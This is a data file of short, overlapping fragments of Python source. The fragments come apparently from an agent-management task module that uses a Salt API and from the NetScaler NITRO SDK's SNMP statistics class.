try: r = requests.post(", "agent in agents: if agent.status == \"overdue\": outages = AgentOutage.objects.filter(agent=agent) if outages and", "inno = ( f\"winagent-v{version}.exe\" if arch == \"64\" else f\"winagent-v{version}-x86.exe\" ) r =", "except Exception: attempts += 1 else: if ret != \"ok\": attempts += 1", "i in q if pyver.parse(i.version) < pyver.parse(settings.LATEST_AGENT_VER) ] chunks = (agents[i : i", "if r == \"timeout\" or r == \"error\": logger.error(f\"Unable to sync modules {agent.salt_id}\")", "range(0, len(online), 30)) for chunk in chunks: Agent.salt_batch_async(minions=chunk, func=\"win_agent.local_sys_info\") sleep(10) @app.task def uninstall_agent_task(salt_id):", "time import sleep import random import requests from packaging import version as pyver", "successfully uninstalled\") try: r = requests.post( f\"http://{settings.SALT_HOST}:8123/run\", json=[ { \"client\": \"wheel\", \"fun\": \"key.delete\",", "= AgentOutage.objects.filter(agent=agent) if outages and outages.last().is_active: continue outage = AgentOutage(agent=agent) outage.save() if agent.overdue_email_alert:", "f\"winagent-v{version}-x86.exe\" ) r = agent.salt_api_async( func=\"win_agent.do_agent_update_v2\", kwargs={ \"inno\": inno, \"url\": url, }, )", "online = [ i.salt_id for i in agents if not i.not_supported(\"0.11.0\") and i.status", "outages and outages.last().is_active: continue outage = AgentOutage(agent=agent) outage.save() if agent.overdue_email_alert: agent_outage_email_task.delay(pk=outage.pk) if agent.overdue_text_alert:", "modules on {agent.hostname}\") return \"ok\" @app.task def batch_sync_modules_task(): # sync modules, split into", "Agent.objects.all() agents = [ i.pk for i in q if pyver.parse(i.version) >= pyver.parse(\"0.11.0\")", "agents = Agent.objects.all() online = [i.salt_id for i in agents if i.status ==", "chunk: agent = Agent.objects.get(pk=pk) r = agent.salt_api_async(func=\"win_agent.update_salt\") sleep(20) @app.task def get_wmi_detail_task(pk): agent =", "in agents if not i.not_supported(\"0.11.0\") and i.status == \"online\" ] chunks = (online[i", "arch = \"64\" elif \"32bit\" in agent.operating_system: arch = \"32\" else: arch =", "if not i.not_supported(\"0.11.0\") and i.status == \"online\" ] chunks = (online[i : i", "= 0 if attempts >= 10: error = True break elif attempts ==", "\"online\"] chunks = (online[i : i + 50] for i in range(0, len(online),", "while 1: try: r = requests.post( f\"http://{settings.SALT_HOST}:8123/run\", json=[ { \"client\": \"local\", \"tgt\": salt_id,", "= AgentOutage.objects.get(pk=pk) outage.send_recovery_email() outage.recovery_email_sent = True outage.save(update_fields=[\"recovery_email_sent\"]) @app.task def agent_outages_task(): agents = Agent.objects.only(\"pk\")", "= agent.salt_api_async(func=\"win_agent.update_salt\") sleep(20) @app.task def get_wmi_detail_task(pk): agent = Agent.objects.get(pk=pk) r = agent.salt_api_cmd(timeout=30, func=\"win_agent.system_info\")", "Agent.objects.get(pk=pk) r = agent.salt_api_cmd(timeout=30, func=\"win_agent.system_info\") if r == \"timeout\" or r == \"error\":", "not overload salt agents = Agent.objects.all() online = [i.salt_id for i in agents", "else: logger.info(f\"{salt_id} was successfully uninstalled\") try: r = requests.post( f\"http://{settings.SALT_HOST}:8123/run\", json=[ { \"client\":", "15)) outage = AgentOutage.objects.get(pk=pk) outage.send_recovery_email() outage.recovery_email_sent = True outage.save(update_fields=[\"recovery_email_sent\"]) @app.task def agent_outages_task(): agents", "in agent.operating_system: arch = \"32\" else: arch = \"64\" url = settings.DL_64 if", "func=\"win_agent.do_agent_update_v2\", kwargs={ \"inno\": inno, \"url\": url, }, ) sleep(10) @app.task def update_salt_minion_task(): q", "settings.DL_64 if arch == \"64\" else settings.DL_32 inno = ( f\"winagent-v{version}.exe\" if arch", "import sleep import random import requests from packaging import version as pyver from" ]
[ "try : result = service.payload_formatter.string_to_resource(snmp_response, response, self.__class__.__name__.replace('_stats','')) if(result.errorcode != 0) : if (result.errorcode", "except Exception as e: raise e @property def snmptotbadversions(self) : \"\"\"Number of SNMP", "KIND, either express or implied. # See the License for the specific language", "= 0 self._snmptottraps = 0 self._snmptoterrreqdropped = 0 self._snmptotparseerrs = 0 self._snmptotbadversions =", "Unless required by applicable law or agreed to in writing, software # distributed", "NetScaler.\"\"\" try : return self._snmptotbadcommname except Exception as e: raise e @property def", "try : return self._snmprxpktsrate except Exception as e: raise e def _get_nitro_response(self, service,", "raise e @property def snmpunknownusername(self) : \"\"\"SNMP packets that were dropped because they", "Exception as e: raise e @property def snmptoterrreqdropped(self) : \"\"\"SNMP requests dropped.\"\"\" try", "= 0 self._snmptotresponses = 0 self._snmpresponsesrate = 0 self._snmptottraps = 0 self._snmptoterrreqdropped =", "processed.\"\"\" try : return self._snmptotgetreqs except Exception as e: raise e @property def", ": \"\"\"Use this API to fetch the statistics of all snmp_stats resources that", "been generated by the NetScaler.\"\"\" try : return self._snmptottraps except Exception as e:", "def snmpgetnextreqsrate(self) : \"\"\"Rate (/s) counter for snmptotgetnextreqs.\"\"\" try : return self._snmpgetnextreqsrate except", "try : return self._snmpunknownusername except Exception as e: raise e @property def snmpunsupportedsecuritylevel(self)", "requests dropped.\"\"\" try : return self._snmptoterrreqdropped except Exception as e: raise e @property", "e def _get_nitro_response(self, service, response) : \"\"\"converts nitro response into object and returns", "SNMP Messages.\"\"\" try : return self._snmptotparseerrs except Exception as e: raise e @property", "@property def snmptottraps(self) : \"\"\"SNMP Trap PDUs that have been generated by the", "the Apache License, Version 2.0 (the \"License\") # you may not use this", "array in case of get request. :param service: :param response: \"\"\" try :", "__init__(self) : self._clearstats = \"\" self._snmptotrxpkts = 0 self._snmprxpktsrate = 0 self._snmptottxpkts =", "\"\"\" \"\"\" def __init__(self) : self._clearstats = \"\" self._snmptotrxpkts = 0 self._snmprxpktsrate =", "result.severity : if (result.severity == \"ERROR\") : raise nitro_exception(result.errorcode, str(result.message), str(result.severity)) else :", "this file except in compliance with the License. # You may obtain a", "\"\"\" try : return self._snmpunsupportedsecuritylevel except Exception as e: raise e @property def", "0 self._snmpdecryptionerrors = 0 @property def clearstats(self) : \"\"\"Clear the statsistics / counters.<br/>Possible", "as e: raise e @property def snmpgetreqsrate(self) : \"\"\"Rate (/s) counter for snmptotgetreqs.\"\"\"", "0 self._snmpwrongdigests = 0 self._snmpdecryptionerrors = 0 @property def clearstats(self) : \"\"\"Clear the", "self._snmptotrxpkts except Exception as e: raise e @property def snmptottxpkts(self) : \"\"\"SNMP packets", "and processed.\"\"\" try : return self._snmptotgetnextreqs except Exception as e: raise e @property", "= 0 self._snmptotbadcommname = 0 self._snmptotbadcommuse = 0 self._snmpunsupportedsecuritylevel = 0 self._snmpnotintimewindow =", "snmptottxpkts.\"\"\" try : return self._snmptxpktsrate except Exception as e: raise e @property def", ": return self._snmptotbadcommname except Exception as e: raise e @property def snmptotgetnextreqs(self) :", "# from nitro.resource.base.base_resource import base_resource from nitro.resource.base.base_resource import base_response from nitro.service.options import options", "clearstats) : \"\"\"Clear the statsistics / counters :param clearstats: \"\"\" try : self._clearstats", ": return self._snmpunknownusername except Exception as e: raise e @property def snmpunsupportedsecuritylevel(self) :", "service.payload_formatter.string_to_resource(snmp_response, response, self.__class__.__name__.replace('_stats','')) if(result.errorcode != 0) : if (result.errorcode == 444) : service.clear_session(self)", "except Exception as e : raise e def _get_object_name(self) : \"\"\"Returns the value", "snmp_response(base_response) : \"\"\" \"\"\" def __init__(self, length=1) : self.snmp = [] self.errorcode =", "try : return self._snmptottraps except Exception as e: raise e @property def snmptotbadversions(self)", "(/s) counter for snmptotgetbulkreqs.\"\"\" try : return self._snmpgetbulkreqsrate except Exception as e: raise", "have been accepted and proZcessed.\"\"\" try : return self._snmptotgetbulkreqs except Exception as e:", "Exception as e: raise e def _get_nitro_response(self, service, response) : \"\"\"converts nitro response", "ANY KIND, either express or implied. # See the License for the specific", "snmprxpktsrate(self) : \"\"\"Rate (/s) counter for snmptotrxpkts.\"\"\" try : return self._snmprxpktsrate except Exception", "0 self._snmptoterrreqdropped = 0 self._snmptotparseerrs = 0 self._snmptotbadversions = 0 self._snmptotbadcommname = 0", "self._snmptottxpkts except Exception as e: raise e @property def snmptotparseerrs(self) : \"\"\"Number of", "except Exception as e: raise e @property def snmptottraps(self) : \"\"\"SNMP Trap PDUs", "0 self._snmptotgetbulkreqs = 0 self._snmpgetbulkreqsrate = 0 self._snmptotresponses = 0 self._snmpresponsesrate = 0", "full.\"\"\" try : return self._clearstats except Exception as e: raise e @clearstats.setter def", ": result = service.payload_formatter.string_to_resource(snmp_response, response, self.__class__.__name__.replace('_stats','')) if(result.errorcode != 0) : if (result.errorcode ==", ": raise e @classmethod def get(cls, service, name=\"\", option_=\"\") : \"\"\"Use this API", "SNMP messages received, which were for an unsupported SNMP version.\"\"\" try : return", "when decoding received SNMP Messages.\"\"\" try : return self._snmptotparseerrs except Exception as e:", "except Exception as e: raise e @clearstats.setter def clearstats(self, clearstats) : \"\"\"Clear the", "they referenced a user that was not known to the SNMP engine.\"\"\" try", "@property def snmptxpktsrate(self) : \"\"\"Rate (/s) counter for snmptottxpkts.\"\"\" try : return self._snmptxpktsrate", ": return self._snmpunknownengineids except Exception as e: raise e @property def snmpwrongdigests(self) :", "0 self._snmpgetbulkreqsrate = 0 self._snmptotresponses = 0 self._snmpresponsesrate = 0 self._snmptottraps = 0", "as e: raise e @clearstats.setter def clearstats(self, clearstats) : \"\"\"Clear the statsistics /", "they requested a security level that was unknown to the NetScaler or otherwise", "as e: raise e @property def snmptotgetreqs(self) : \"\"\"SNMP Get-Request PDUs that have", "= 0 self._snmptottxpkts = 0 self._snmptxpktsrate = 0 self._snmptotgetreqs = 0 self._snmpgetreqsrate =", ": \"\"\"Rate (/s) counter for snmptotresponses.\"\"\" try : return self._snmpresponsesrate except Exception as", "raise e @property def snmprxpktsrate(self) : \"\"\"Rate (/s) counter for snmptotrxpkts.\"\"\" try :", "e: raise e @property def snmptotbadcommuse(self) : \"\"\"The total number of SNMP Messages", ": return 0 except Exception as e : raise e @classmethod def get(cls,", "service, name=\"\", option_=\"\") : \"\"\"Use this API to fetch the statistics of all", "e @property def snmpgetbulkreqsrate(self) : \"\"\"Rate (/s) counter for snmptotgetbulkreqs.\"\"\" try : return", "WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See", "= \"\" self._snmptotrxpkts = 0 self._snmprxpktsrate = 0 self._snmptottxpkts = 0 self._snmptxpktsrate =", "0 @property def clearstats(self) : \"\"\"Clear the statsistics / counters.<br/>Possible values = basic,", "received that represented an SNMP operation which was not allowed by the SNMP", "total number of SNMP Messages received that represented an SNMP operation which was", "try : return self._snmptotparseerrs except Exception as e: raise e @property def snmptottraps(self)", "e: raise e @property def snmpnotintimewindow(self) : \"\"\"SNMP packets that were dropped because", ":param service: :param response: \"\"\" try : result = service.payload_formatter.string_to_resource(snmp_response, response, self.__class__.__name__.replace('_stats','')) if(result.errorcode", "netscaler. :param service: :param name: (Default value = \"\") :param option_: (Default value", "(/s) counter for snmptotresponses.\"\"\" try : return self._snmpresponsesrate except Exception as e: raise", "e: raise e @property def snmptotgetnextreqs(self) : \"\"\"SNMP Get-Next PDUs that have been", "self._snmpnotintimewindow except Exception as e: raise e @property def snmptotgetbulkreqs(self) : \"\"\"SNMP Get-Bulk", "e: raise e @property def snmptotbadcommname(self) : \"\"\"SNMP messages received, which used an", "Exception as e: raise e @property def snmpgetbulkreqsrate(self) : \"\"\"Rate (/s) counter for", "0 self._snmptotbadcommname = 0 self._snmptotbadcommuse = 0 self._snmpunsupportedsecuritylevel = 0 self._snmpnotintimewindow = 0", "did not contain the expected digest value.\"\"\" try : return self._snmpwrongdigests except Exception", "e: raise e @property def snmptotparseerrs(self) : \"\"\"Number of ASN.1 or BER errors", "service.clear_session(self) if result.severity : if (result.severity == \"ERROR\") : raise nitro_exception(result.errorcode, str(result.message), str(result.severity))", "def __init__(self, length=1) : self.snmp = [] self.errorcode = 0 self.message = \"\"", ": \"\"\"SNMP packets that were dropped because they appeared outside of the authoritative", "def snmpunsupportedsecuritylevel(self) : \"\"\"SNMP packets that were dropped because they requested a security", "IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or", "raise e @classmethod def get(cls, service, name=\"\", option_=\"\") : \"\"\"Use this API to", "snmpunknownengineids(self) : \"\"\"SNMP packets that were dropped because they referenced an SNMP engine", "def snmptotparseerrs(self) : \"\"\"Number of ASN.1 or BER errors encountered when decoding received", "not allowed by the SNMP community named in the Message.\"\"\" try : return", "= 0 self.message = \"\" self.severity = \"\" self.sessionid = \"\" self.snmp =", "as e: raise e @property def snmptotbadcommname(self) : \"\"\"SNMP messages received, which used", "\"\"\"Returns the value of object identifier argument\"\"\" try : return 0 except Exception", "of all snmp_stats resources that are configured on netscaler. :param service: :param name:", "accepted and processed.\"\"\" try : return self._snmptotgetnextreqs except Exception as e: raise e", "OF ANY KIND, either express or implied. # See the License for the", "as e: raise e def _get_nitro_response(self, service, response) : \"\"\"converts nitro response into", "by the NetScaler.\"\"\" try : return self._snmptottraps except Exception as e: raise e", "PDUs that have been accepted and processed.\"\"\" try : return self._snmptotgetreqs except Exception", "as e: raise e @property def snmpunknownusername(self) : \"\"\"SNMP packets that were dropped", ": \"\"\"converts nitro response into object and returns the object array in case", ": \"\"\"SNMP Get-Response PDUs that have been generated by the NetScaler.\"\"\" try :", "e @property def snmptotbadversions(self) : \"\"\"Number of SNMP messages received, which were for", "an unsupported SNMP version.\"\"\" try : return self._snmptotbadversions except Exception as e: raise", ": return self._snmptotgetnextreqs except Exception as e: raise e @property def snmpunknownengineids(self) :", "def snmptotbadversions(self) : \"\"\"Number of SNMP messages received, which were for an unsupported", "= 0 self._snmpunsupportedsecuritylevel = 0 self._snmpnotintimewindow = 0 self._snmpunknownusername = 0 self._snmpunknownengineids =", "BER errors encountered when decoding received SNMP Messages.\"\"\" try : return self._snmptotparseerrs except", "self._snmpunknownusername except Exception as e: raise e @property def snmpunsupportedsecuritylevel(self) : \"\"\"SNMP packets", "the expected digest value.\"\"\" try : return self._snmpwrongdigests except Exception as e: raise", "self._snmptottraps = 0 self._snmptoterrreqdropped = 0 self._snmptotparseerrs = 0 self._snmptotbadversions = 0 self._snmptotbadcommname", "snmptotresponses(self) : \"\"\"SNMP Get-Response PDUs that have been generated by the NetScaler.\"\"\" try", "Exception as e : raise e @classmethod def get(cls, service, name=\"\", option_=\"\") :", "ASN.1 or BER errors encountered when decoding received SNMP Messages.\"\"\" try : return", "snmptotgetnextreqs.\"\"\" try : return self._snmpgetnextreqsrate except Exception as e: raise e @property def", ": \"\"\"Returns the value of object identifier argument\"\"\" try : return 0 except", "= 0 self._snmptotparseerrs = 0 self._snmptotbadversions = 0 self._snmptotbadcommname = 0 self._snmptotbadcommuse =", ": \"\"\"SNMP packets transmitted.\"\"\" try : return self._snmptottxpkts except Exception as e: raise", "except Exception as e : raise e @classmethod def get(cls, service, name=\"\", option_=\"\")", "on netscaler. :param service: :param name: (Default value = \"\") :param option_: (Default", "e @property def snmpgetnextreqsrate(self) : \"\"\"Rate (/s) counter for snmptotgetnextreqs.\"\"\" try : return", "packets that were dropped because they could not be decrypted.\"\"\" try : return", "which were for an unsupported SNMP version.\"\"\" try : return self._snmptotbadversions except Exception", "the statsistics / counters.<br/>Possible values = basic, full.\"\"\" try : return self._clearstats except", "they could not be decrypted.\"\"\" try : return self._snmpdecryptionerrors except Exception as e:", ": if (result.errorcode == 444) : service.clear_session(self) if result.severity : if (result.severity ==", "self._snmptotgetbulkreqs = 0 self._snmpgetbulkreqsrate = 0 self._snmptotresponses = 0 self._snmpresponsesrate = 0 self._snmptottraps", "raise e @property def snmptoterrreqdropped(self) : \"\"\"SNMP requests dropped.\"\"\" try : return self._snmptoterrreqdropped", "that was not known to the SNMP engine.\"\"\" try : return self._snmpunknownusername except", "allowed by the SNMP community named in the Message.\"\"\" try : return self._snmptotbadcommuse", "\"\"\"Rate (/s) counter for snmptotresponses.\"\"\" try : return self._snmpresponsesrate except Exception as e:", "raise e @property def snmptotbadcommname(self) : \"\"\"SNMP messages received, which used an SNMP", "except Exception as e: raise e @property def snmpresponsesrate(self) : \"\"\"Rate (/s) counter", "in the Message.\"\"\" try : return self._snmptotbadcommuse except Exception as e: raise e", "the SNMP engine.\"\"\" try : return self._snmpunknownusername except Exception as e: raise e", "Exception as e: raise e @property def snmprxpktsrate(self) : \"\"\"Rate (/s) counter for", "= obj.stat_resources(service, option_) return response except Exception as e: raise e class Clearstats:", "engine ID that was not known to the NetScaler.\"\"\" try : return self._snmpunknownengineids", "class snmp_stats(base_resource) : \"\"\" \"\"\" def __init__(self) : self._clearstats = \"\" self._snmptotrxpkts =", "have been generated by the NetScaler.\"\"\" try : return self._snmptottraps except Exception as", "def snmptotrxpkts(self) : \"\"\"SNMP packets received.\"\"\" try : return self._snmptotrxpkts except Exception as", "software # distributed under the License is distributed on an \"AS IS\" BASIS,", ": \"\"\"SNMP messages received, which used an SNMP community name not known to", "counter for snmptotgetbulkreqs.\"\"\" try : return self._snmpgetbulkreqsrate except Exception as e: raise e", ": \"\"\"Clear the statsistics / counters.<br/>Possible values = basic, full.\"\"\" try : return", "self._snmpgetnextreqsrate = 0 self._snmptotgetbulkreqs = 0 self._snmpgetbulkreqsrate = 0 self._snmptotresponses = 0 self._snmpresponsesrate", "self._snmptotresponses except Exception as e: raise e @property def snmptotbadcommuse(self) : \"\"\"The total", "service: :param response: \"\"\" try : result = service.payload_formatter.string_to_resource(snmp_response, response, self.__class__.__name__.replace('_stats','')) if(result.errorcode !=", "class snmp_response(base_response) : \"\"\" \"\"\" def __init__(self, length=1) : self.snmp = [] self.errorcode", "# # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to", "transmitted.\"\"\" try : return self._snmptottxpkts except Exception as e: raise e @property def", ": \"\"\"Clear the statsistics / counters :param clearstats: \"\"\" try : self._clearstats =", "\"\") :param option_: (Default value = \"\") \"\"\" try : obj = snmp_stats()", "that have been generated by the NetScaler.\"\"\" try : return self._snmptottraps except Exception", "\"\"\"Number of SNMP messages received, which were for an unsupported SNMP version.\"\"\" try", "Get-Response PDUs that have been generated by the NetScaler.\"\"\" try : return self._snmptotresponses", "Exception as e: raise e @property def snmptotparseerrs(self) : \"\"\"Number of ASN.1 or", "\"\"\"SNMP packets that were dropped because they referenced an SNMP engine ID that", "request. :param service: :param response: \"\"\" try : result = service.payload_formatter.string_to_resource(snmp_response, response, self.__class__.__name__.replace('_stats',''))", "0 self._snmpgetnextreqsrate = 0 self._snmptotgetbulkreqs = 0 self._snmpgetbulkreqsrate = 0 self._snmptotresponses = 0", "requested a security level that was unknown to the NetScaler or otherwise unavailable.", "= 0 self._snmpnotintimewindow = 0 self._snmpunknownusername = 0 self._snmpunknownengineids = 0 self._snmpwrongdigests =", "Licensed under the Apache License, Version 2.0 (the \"License\") # you may not", "from nitro.resource.base.base_resource import base_response from nitro.service.options import options from nitro.exception.nitro_exception import nitro_exception from", "raise e @property def snmpgetbulkreqsrate(self) : \"\"\"Rate (/s) counter for snmptotgetbulkreqs.\"\"\" try :", "try : return self._snmptotresponses except Exception as e: raise e @property def snmptotbadcommuse(self)", "that were dropped because they appeared outside of the authoritative SNMP engine's window.\"\"\"", "option_: (Default value = \"\") \"\"\" try : obj = snmp_stats() if not", "under the License is distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES", "self._snmptotgetnextreqs = 0 self._snmpgetnextreqsrate = 0 self._snmptotgetbulkreqs = 0 self._snmpgetbulkreqsrate = 0 self._snmptotresponses", "the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law", "Get-Next PDUs that have been accepted and processed.\"\"\" try : return self._snmptotgetnextreqs except", "def snmptottraps(self) : \"\"\"SNMP Trap PDUs that have been generated by the NetScaler.\"\"\"", "that have been accepted and processed.\"\"\" try : return self._snmptotgetnextreqs except Exception as", "\"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express", "self._snmpgetbulkreqsrate except Exception as e: raise e @property def snmpnotintimewindow(self) : \"\"\"SNMP packets", "nitro.exception.nitro_exception import nitro_exception from nitro.util.nitro_util import nitro_util class snmp_stats(base_resource) : \"\"\" \"\"\" def", "PDUs that have been accepted and processed.\"\"\" try : return self._snmptotgetnextreqs except Exception", "snmptotgetreqs(self) : \"\"\"SNMP Get-Request PDUs that have been accepted and processed.\"\"\" try :", "that were dropped because they requested a security level that was unknown to", "\"basic\" full = \"full\" class snmp_response(base_response) : \"\"\" \"\"\" def __init__(self, length=1) :", "self._snmptotrxpkts = 0 self._snmprxpktsrate = 0 self._snmptottxpkts = 0 self._snmptxpktsrate = 0 self._snmptotgetreqs", "as e: raise e @property def snmptotrxpkts(self) : \"\"\"SNMP packets received.\"\"\" try :", "self._snmpunknownengineids except Exception as e: raise e @property def snmpwrongdigests(self) : \"\"\"SNMP packets", "as e: raise e @property def snmpunsupportedsecuritylevel(self) : \"\"\"SNMP packets that were dropped", "the object array in case of get request. :param service: :param response: \"\"\"", "e @property def snmpwrongdigests(self) : \"\"\"SNMP packets that were dropped because they did", "community name not known to the NetScaler.\"\"\" try : return self._snmptotbadcommname except Exception", "required by applicable law or agreed to in writing, software # distributed under", "return self._snmptotgetnextreqs except Exception as e: raise e @property def snmpunknownengineids(self) : \"\"\"SNMP", "the NetScaler.\"\"\" try : return self._snmptottraps except Exception as e: raise e @property", "by the SNMP community named in the Message.\"\"\" try : return self._snmptotbadcommuse except", "@property def snmpgetreqsrate(self) : \"\"\"Rate (/s) counter for snmptotgetreqs.\"\"\" try : return self._snmpgetreqsrate", ": return self._snmptoterrreqdropped except Exception as e: raise e @property def snmpgetnextreqsrate(self) :", "counter for snmptottxpkts.\"\"\" try : return self._snmptxpktsrate except Exception as e: raise e", "as e: raise e @property def snmpgetbulkreqsrate(self) : \"\"\"Rate (/s) counter for snmptotgetbulkreqs.\"\"\"", "service, response) : \"\"\"converts nitro response into object and returns the object array", "was not allowed by the SNMP community named in the Message.\"\"\" try :", "except Exception as e: raise e @property def snmptotrxpkts(self) : \"\"\"SNMP packets received.\"\"\"", "applicable law or agreed to in writing, software # distributed under the License", "packets that were dropped because they referenced an SNMP engine ID that was", "returns the object array in case of get request. :param service: :param response:", "window.\"\"\" try : return self._snmpnotintimewindow except Exception as e: raise e @property def", "self._snmptotparseerrs = 0 self._snmptotbadversions = 0 self._snmptotbadcommname = 0 self._snmptotbadcommuse = 0 self._snmpunsupportedsecuritylevel", "snmptoterrreqdropped(self) : \"\"\"SNMP requests dropped.\"\"\" try : return self._snmptoterrreqdropped except Exception as e:", "= snmp_stats() if not name : response = obj.stat_resources(service, option_) return response except", ": self._clearstats = clearstats except Exception as e: raise e @property def snmpdecryptionerrors(self)", "NetScaler.\"\"\" try : return self._snmptottraps except Exception as e: raise e @property def", "to fetch the statistics of all snmp_stats resources that are configured on netscaler.", "raise e def _get_nitro_response(self, service, response) : \"\"\"converts nitro response into object and", "try : return self._snmptotrxpkts except Exception as e: raise e @property def snmptottxpkts(self)", "self._snmpwrongdigests except Exception as e: raise e @property def snmpgetbulkreqsrate(self) : \"\"\"Rate (/s)", "(c) 2008-2015 Citrix Systems, Inc. # # Licensed under the Apache License, Version", "or agreed to in writing, software # distributed under the License is distributed", "options from nitro.exception.nitro_exception import nitro_exception from nitro.util.nitro_util import nitro_util class snmp_stats(base_resource) : \"\"\"", "clearstats: \"\"\" try : self._clearstats = clearstats except Exception as e: raise e", "try : return self._clearstats except Exception as e: raise e @clearstats.setter def clearstats(self,", "not be decrypted.\"\"\" try : return self._snmpdecryptionerrors except Exception as e: raise e", "they did not contain the expected digest value.\"\"\" try : return self._snmpwrongdigests except", "that were dropped because they referenced a user that was not known to", "e @property def snmpdecryptionerrors(self) : \"\"\"SNMP packets that were dropped because they could", "e @property def snmptotparseerrs(self) : \"\"\"Number of ASN.1 or BER errors encountered when", "0 self._snmpgetreqsrate = 0 self._snmptotgetnextreqs = 0 self._snmpgetnextreqsrate = 0 self._snmptotgetbulkreqs = 0", ": \"\"\"Rate (/s) counter for snmptottxpkts.\"\"\" try : return self._snmptxpktsrate except Exception as", ": \"\"\"SNMP requests dropped.\"\"\" try : return self._snmptoterrreqdropped except Exception as e: raise", "Exception as e: raise e @property def snmptotgetnextreqs(self) : \"\"\"SNMP Get-Next PDUs that", "= 0 self._snmpgetnextreqsrate = 0 self._snmptotgetbulkreqs = 0 self._snmpgetbulkreqsrate = 0 self._snmptotresponses =", "have been generated by the NetScaler.\"\"\" try : return self._snmptotresponses except Exception as", "resources that are configured on netscaler. :param service: :param name: (Default value =", "CONDITIONS OF ANY KIND, either express or implied. # See the License for", "= 0 self._snmpunknownengineids = 0 self._snmpwrongdigests = 0 self._snmpdecryptionerrors = 0 @property def", "e @property def snmpnotintimewindow(self) : \"\"\"SNMP packets that were dropped because they appeared", ": return self._snmptotbadversions except Exception as e: raise e @property def snmptxpktsrate(self) :", "except Exception as e: raise e @property def snmprxpktsrate(self) : \"\"\"Rate (/s) counter", "self._snmptotparseerrs except Exception as e: raise e @property def snmptottraps(self) : \"\"\"SNMP Trap", "0 self._snmptotresponses = 0 self._snmpresponsesrate = 0 self._snmptottraps = 0 self._snmptoterrreqdropped = 0", "packets that were dropped because they appeared outside of the authoritative SNMP engine's", "version.\"\"\" try : return self._snmptotbadversions except Exception as e: raise e @property def", "that was unknown to the NetScaler or otherwise unavailable. \"\"\" try : return", "= basic, full.\"\"\" try : return self._clearstats except Exception as e: raise e", "try : return self._snmpgetnextreqsrate except Exception as e: raise e @property def snmptotrxpkts(self)", "that was not known to the NetScaler.\"\"\" try : return self._snmpunknownengineids except Exception", "(/s) counter for snmptottxpkts.\"\"\" try : return self._snmptxpktsrate except Exception as e: raise", "(result.severity == \"ERROR\") : raise nitro_exception(result.errorcode, str(result.message), str(result.severity)) else : raise nitro_exception(result.errorcode, str(result.message),", "self._snmpunsupportedsecuritylevel = 0 self._snmpnotintimewindow = 0 self._snmpunknownusername = 0 self._snmpunknownengineids = 0 self._snmpwrongdigests", "writing, software # distributed under the License is distributed on an \"AS IS\"", "return self._snmptotbadcommuse except Exception as e: raise e @property def snmptoterrreqdropped(self) : \"\"\"SNMP", ": return self._snmptotrxpkts except Exception as e: raise e @property def snmptottxpkts(self) :", "except Exception as e: raise e @property def snmptotbadcommname(self) : \"\"\"SNMP messages received,", "received.\"\"\" try : return self._snmptotrxpkts except Exception as e: raise e @property def", ": return self._snmpwrongdigests except Exception as e: raise e @property def snmpgetbulkreqsrate(self) :", "were dropped because they appeared outside of the authoritative SNMP engine's window.\"\"\" try", "\"\"\" \"\"\" def __init__(self, length=1) : self.snmp = [] self.errorcode = 0 self.message", ":param clearstats: \"\"\" try : self._clearstats = clearstats except Exception as e: raise", "You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 #", ": return self._snmptotbadcommuse except Exception as e: raise e @property def snmptoterrreqdropped(self) :", ": return self._snmptotresponses except Exception as e: raise e @property def snmptotbadcommuse(self) :", "because they referenced a user that was not known to the SNMP engine.\"\"\"", "License. # You may obtain a copy of the License at # #", "e : raise e def _get_object_name(self) : \"\"\"Returns the value of object identifier", "except Exception as e: raise e @property def snmptotparseerrs(self) : \"\"\"Number of ASN.1", "try : return self._snmpdecryptionerrors except Exception as e: raise e @property def snmptotresponses(self)", "== 444) : service.clear_session(self) if result.severity : if (result.severity == \"ERROR\") : raise", "= clearstats except Exception as e: raise e @property def snmpdecryptionerrors(self) : \"\"\"SNMP", "the statsistics / counters :param clearstats: \"\"\" try : self._clearstats = clearstats except", "self.__class__.__name__.replace('_stats','')) if(result.errorcode != 0) : if (result.errorcode == 444) : service.clear_session(self) if result.severity", "limitations under the License. # from nitro.resource.base.base_resource import base_resource from nitro.resource.base.base_resource import base_response", ": \"\"\"Number of ASN.1 or BER errors encountered when decoding received SNMP Messages.\"\"\"", "clearstats(self, clearstats) : \"\"\"Clear the statsistics / counters :param clearstats: \"\"\" try :", "compliance with the License. # You may obtain a copy of the License", "try : return self._snmptottxpkts except Exception as e: raise e @property def snmptotparseerrs(self)", "Message.\"\"\" try : return self._snmptotbadcommuse except Exception as e: raise e @property def", "value = \"\") \"\"\" try : obj = snmp_stats() if not name :", "not name : response = obj.stat_resources(service, option_) return response except Exception as e:", "snmpunsupportedsecuritylevel(self) : \"\"\"SNMP packets that were dropped because they requested a security level", "Version 2.0 (the \"License\") # you may not use this file except in", "of ASN.1 or BER errors encountered when decoding received SNMP Messages.\"\"\" try :", "except Exception as e: raise e @property def snmpwrongdigests(self) : \"\"\"SNMP packets that", "def snmptotbadcommuse(self) : \"\"\"The total number of SNMP Messages received that represented an", "Exception as e: raise e @property def snmpnotintimewindow(self) : \"\"\"SNMP packets that were", "= 0 self._snmprxpktsrate = 0 self._snmptottxpkts = 0 self._snmptxpktsrate = 0 self._snmptotgetreqs =", "self._snmptotgetreqs = 0 self._snmpgetreqsrate = 0 self._snmptotgetnextreqs = 0 self._snmpgetnextreqsrate = 0 self._snmptotgetbulkreqs", ": return self._snmpgetnextreqsrate except Exception as e: raise e @property def snmptotrxpkts(self) :", "snmpgetreqsrate(self) : \"\"\"Rate (/s) counter for snmptotgetreqs.\"\"\" try : return self._snmpgetreqsrate except Exception", "= \"\") :param option_: (Default value = \"\") \"\"\" try : obj =", ": service.clear_session(self) if result.severity : if (result.severity == \"ERROR\") : raise nitro_exception(result.errorcode, str(result.message),", "SNMP community named in the Message.\"\"\" try : return self._snmptotbadcommuse except Exception as", "of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable", "def _get_object_name(self) : \"\"\"Returns the value of object identifier argument\"\"\" try : return", "(the \"License\") # you may not use this file except in compliance with", "fetch the statistics of all snmp_stats resources that are configured on netscaler. :param", ": \"\"\"SNMP packets that were dropped because they could 